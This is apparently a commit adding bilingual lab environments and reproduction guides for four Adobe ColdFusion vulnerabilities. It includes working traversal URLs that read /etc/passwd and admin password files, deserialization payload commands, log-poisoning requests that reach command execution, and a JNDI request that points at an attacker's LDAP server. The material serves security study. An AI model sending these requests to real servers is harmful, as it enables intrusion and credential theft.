first commit

coldfusion/CVE-2010-2861/README.md

@@ -0,0 +1,27 @@
+# Adobe ColdFusion Directory Traversal Vulnerability (CVE-2010-2861)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
+
+There is a directory traversal vulnerability in the Adobe ColdFusion 9.0.1 and earlier, which allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
+
+## Environment setup
+
+Execute the following command to start Adobe CouldFusion 8.0.1 server:
+
+```
+docker compose up -d
+```
+
+The server startup may take 1~5 minutes. After that, visit `http://your-ip:8500/CFIDE/administrator/enter.cfm` to see the initialization page, enter the password `admin` to initialize the entire server.
+
+## POC
+
+Read the file `/etc/passwd` via `http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`:
+
+![](1.png)
+
+Read the background administrator password via `http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/ password.properties%00en`:
+
+![](2.png)

coldfusion/CVE-2010-2861/README.zh-cn.md

@@ -0,0 +1,25 @@
+# Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）
+
+Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
+
+Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。
+
+## 环境搭建
+
+执行如下命令启动Adobe CouldFusion 8.0.1版本服务器：
+
+```
+docker compose up -d
+```
+
+环境启动可能需要1~5分钟，启动后，访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`，可以看到初始化页面，输入密码`admin`，开始初始化整个环境。
+
+## 漏洞复现
+
+直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`，即可读取文件`/etc/passwd`：
+
+![](1.png)
+
+读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`：
+
+![](2.png)

coldfusion/CVE-2010-2861/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+  coldfusion:
+    image: vulhub/coldfusion:8.0.1
+    ports:
+      - "8500:8500"

coldfusion/CVE-2017-3066/README.md

@@ -0,0 +1,57 @@
+# Adobe ColdFusion AMF Deserialization Remote Command Execution (CVE-2017-3066)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
+
+Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution.
+
+References:
+
+- https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
+- https://www.exploit-db.com/exploits/43993
+- https://github.com/codewhitesec/ColdFusionPwn
+
+## Vulnerable environment
+
+Start a Adobe ColdFusion 11 update 3:
+
+```
+docker compose up -d
+```
+
+After a few minutes wait, visit `http://your-ip:8500/CFIDE/administrator/index.cfm` with password `vulhub`, you can install the Adobe ColdFusion successfully.
+
+## Exploit
+
+Generate a POC via [ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn) in the `poc.ser`:
+
+```
+java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
+```
+
+Send the request to `http://your-ip:8500/flex2gateway/amf`, which contains the `application/x-amf` Content-Type and POC within the body:
+
+```
+POST /flex2gateway/amf HTTP/1.1
+Host: your-ip:8500
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-amf
+Content-Length: 2853
+
+[...poc...]
+```
+
+![](1.png)
+
+`/tmp/success` is successfully created:
+
+![](2.png)
+
+Get a reverse shell:
+
+![](3.png)

coldfusion/CVE-2017-3066/README.zh-cn.md

@@ -0,0 +1,55 @@
+# Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）
+
+Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
+
+Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响：Adobe ColdFusion (2016 release) Update 3及之前的版本，ColdFusion 11 Update 11及之前的版本，ColdFusion 10 Update 22及之前的版本。
+
+参考链接：
+
+- https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
+- https://www.exploit-db.com/exploits/43993
+- https://github.com/codewhitesec/ColdFusionPwn
+
+## 漏洞环境
+
+启动漏洞环境：
+
+```
+docker compose up -d
+```
+
+等待数分钟时间，环境启动成功，访问`http://your-ip:8500/CFIDE/administrator/index.cfm`，输入密码`vulhub`，即可成功安装Adobe ColdFusion。
+
+## 漏洞复现
+
+我们使用参考链接中的[ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn)工具来生成POC：
+
+```
+java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
+```
+
+POC生成于poc.ser文件中，将POC作为数据包body发送给`http://your-ip:8500/flex2gateway/amf`，Content-Type为application/x-amf：
+
+```
+POST /flex2gateway/amf HTTP/1.1
+Host: your-ip:8500
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-amf
+Content-Length: 2853
+
+[...poc...]
+```
+
+![](1.png)
+
+进入容器中，发现`/tmp/success`已成功创建：
+
+![](2.png)
+
+将POC改成[反弹命令](http://www.jackson-t.ca/runtime-exec-payloads.html)，成功拿到shell：
+
+![](3.png)

coldfusion/CVE-2017-3066/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+  coldfusion:
+    image: vulhub/coldfusion:11u3
+    ports:
+      - "8500:8500"

coldfusion/CVE-2023-26360/README.md

@@ -0,0 +1,77 @@
+# Adobe ColdFusion Local File Inclusion Leads to RCE (CVE-2023-26360)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
+
+Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in local file inclusion and arbitrary code execution in the context of the current user.
+
+References:
+
+- <https://xz.aliyun.com/t/13392>
+
+## Vulnerable environment
+
+Start a Adobe ColdFusion 2018.0.15:
+
+```
+docker compose up -d
+```
+
+After a few minutes wait, visit `http://your-ip:8500/CFIDE/administrator/index.cfm` with password `vulhub`, you can install the Adobe ColdFusion successfully.
+
+## Exploit
+
+Simply send following request to server to download `/proc/self/environ`:
+
+```
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost:8500
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 82
+Content-Type: application/x-www-form-urlencoded
+
+_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}
+```
+
+Then you will find the base directory `/opt/coldfusion/cfusion` of Adobe ColdFusion:
+
+![](1.png)
+
+Retrieve password by `../../../../../../../../opt/coldfusion/cfusion/lib/password.properties`:
+
+![](2.png)
+
+To exploit the arbitrary code execution issue, first send a request to the server containing a CFM script:
+
+```
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost:8500
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 67
+Content-Type: application/x-www-form-urlencoded
+
+_variables=<cfexecute name='id' outputFile='/tmp/success' ></cfexecute>
+```
+
+Then, include the log file to execute the CFM script:
+
+```
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost:8500
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 111
+Content-Type: application/x-www-form-urlencoded
+
+_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}
+```
+
+The `id` command is executed and output to `/tmp/success`:
+
+![](3.png)

coldfusion/CVE-2023-26360/README.zh-cn.md

@@ -0,0 +1,75 @@
+# Adobe ColdFusion 本地文件包含漏洞（CVE-2023-26360）
+
+Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
+
+Adobe ColdFusion 2018 Update 15 和 2021 Update 5 版本及以前，存在一处文件包含漏洞。攻击者可以利用该漏洞在服务器上执行任意代码。
+
+参考链接：
+
+- <https://xz.aliyun.com/t/13392>
+
+## 漏洞环境
+
+启动一个Adobe ColdFusion 2018.0.15服务器：
+
+```
+docker compose up -d
+```
+
+等待一段时间后环境启动成功，访问`http://your-ip:8500/CFIDE/administrator/index.cfm`，输入密码`vulhub`，即可成功安装Adobe ColdFusion。
+
+## 漏洞复现
+
+发送如下请求即可读取文件`/proc/self/environ`：
+
+```
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost:8500
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 82
+Content-Type: application/x-www-form-urlencoded
+
+_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}
+```
+
+你可以在返回包中找到Adobe ColdFusion的根目录`/opt/coldfusion/cfusion`：
+
+![](1.png)
+
+从`../../../../../../../../opt/coldfusion/cfusion/lib/password.properties`中读取服务器密码：
+
+![](2.png)
+
+想要利用文件包含漏洞执行任意代码，需要先发送如下请求来写入CFM脚本：
+
+```
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost:8500
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 67
+Content-Type: application/x-www-form-urlencoded
+
+_variables=<cfexecute name='id' outputFile='/tmp/success' ></cfexecute>
+```
+
+然后包含日志文件，执行该CFM代码：
+
+```
+POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost:8500
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Length: 111
+Content-Type: application/x-www-form-urlencoded
+
+_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}
+```
+
+可见，`id`命令的执行结果已经被写入`/tmp/success`：
+
+![](3.png)

coldfusion/CVE-2023-26360/docker-compose.yml

@@ -0,0 +1,10 @@
+version: '2'
+services:
+  coldfusion:
+    image: vulhub/coldfusion:2018.0.15
+    ports:
+      - "8500:8500"
+      - "5005:5005"
+    environment:
+      - password=vulhub
+      - acceptEULA=YES

coldfusion/CVE-2023-29300/README.md

@@ -0,0 +1,50 @@
+# Adobe ColdFusion XML Deserialization Leads to RCE (CVE-2023-29300)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
+
+Adobe ColdFusion versions 2018 Update 16 (and earlier), 2021 Update 6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a deserialization of untrusted data vulnerability. Attacker is able to call arbitrary setter function and execute arbitrary commands eventually.
+
+References:
+
+- <https://blog.projectdiscovery.io/adobe-coldfusion-rce/>
+- <https://xz.aliyun.com/t/13413>
+
+## Vulnerable environment
+
+Start a Adobe ColdFusion 2018.0.15:
+
+```
+docker compose up -d
+```
+
+After a few minutes wait, visit `http://your-ip:8500/CFIDE/administrator/index.cfm` with password `vulhub`, you can install the Adobe ColdFusion successfully.
+
+## Exploit
+
+To exploit this issue, you have to find a valid gadget to execute arbitrary code in ColdFusion server. The most common gadget is `com.sun.rowset.JdbcRowSetImpl` that uses the JNDI injection to execute the command.
+
+We utilize the [Java Chains](https://github.com/vulhub/java-chains) tool for vulnerability reproduction. To get started with Java Chains, please visit the [Quick Start](https://java-chains.vulhub.org/docs/guide) guide.  Then, following the instructions in the screenshot below, generate a payload based on the `CommonsBeanutils1` exploit chain.
+
+![](1.png)
+
+Then, send the following request to ColdFusion server (replace with your LDAP server address):
+
+```
+POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 333
+
+argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your.ldap.server/example</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>
+```
+
+As you can see, the `touch /tmp/success` is executed successfully:
+
+![](2.png)

coldfusion/CVE-2023-29300/README.zh-cn.md

@@ -0,0 +1,48 @@
+# Adobe ColdFusion XML 反序列化命令执行漏洞（CVE-2023-29300）
+
+Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。
+
+Adobe ColdFusion在2018.0.16、2021.0.6、2023.0.0.330468版本及以前，存在一处XML反序列化漏洞。攻击者可以利用该漏洞调用Java中任意setter方法，最终执行任意命令。
+
+参考链接：
+
+- <https://blog.projectdiscovery.io/adobe-coldfusion-rce/>
+- <https://xz.aliyun.com/t/13413>
+
+## 漏洞环境
+
+启动一个Adobe ColdFusion 2018.0.15服务器：
+
+```
+docker compose up -d
+```
+
+等待一段时间后环境启动成功，访问`http://your-ip:8500/CFIDE/administrator/index.cfm`，输入密码`vulhub`，即可成功安装Adobe ColdFusion。
+
+## 漏洞复现
+
+要利用这个漏洞，需要先找到一个可利用的setter方法作为Gadget。最常见的Gadget是利用`com.sun.rowset.JdbcRowSetImpl`来进行JNDI注入，并执行任意命令。
+
+我们使用 [Java Chains](https://github.com/vulhub/java-chains) 工具来进行漏洞复现，通过访问 [快速入手](https://java-chains.vulhub.org/zh/docs/guide) 来启动 Java Chains，并根据下面截图的操作生成基于`CommonsBeanutils1`利用链的 payload：
+
+![](1.png)
+
+然后，将恶意LDAP地址替换到如下请求中发送：
+
+```
+POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
+Host: localhost
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 333
+
+argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your.ldap.server/example</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>
+```
+
+可见，`touch /tmp/success`已被成功执行：
+
+![](2.png)

coldfusion/CVE-2023-29300/docker-compose.yml

@@ -0,0 +1,9 @@
+services:
+  coldfusion:
+    image: vulhub/coldfusion:2018.0.15
+    ports:
+      - "8500:8500"
+      - "5005:5005"
+    environment:
+      - password=vulhub
+      - acceptEULA=YES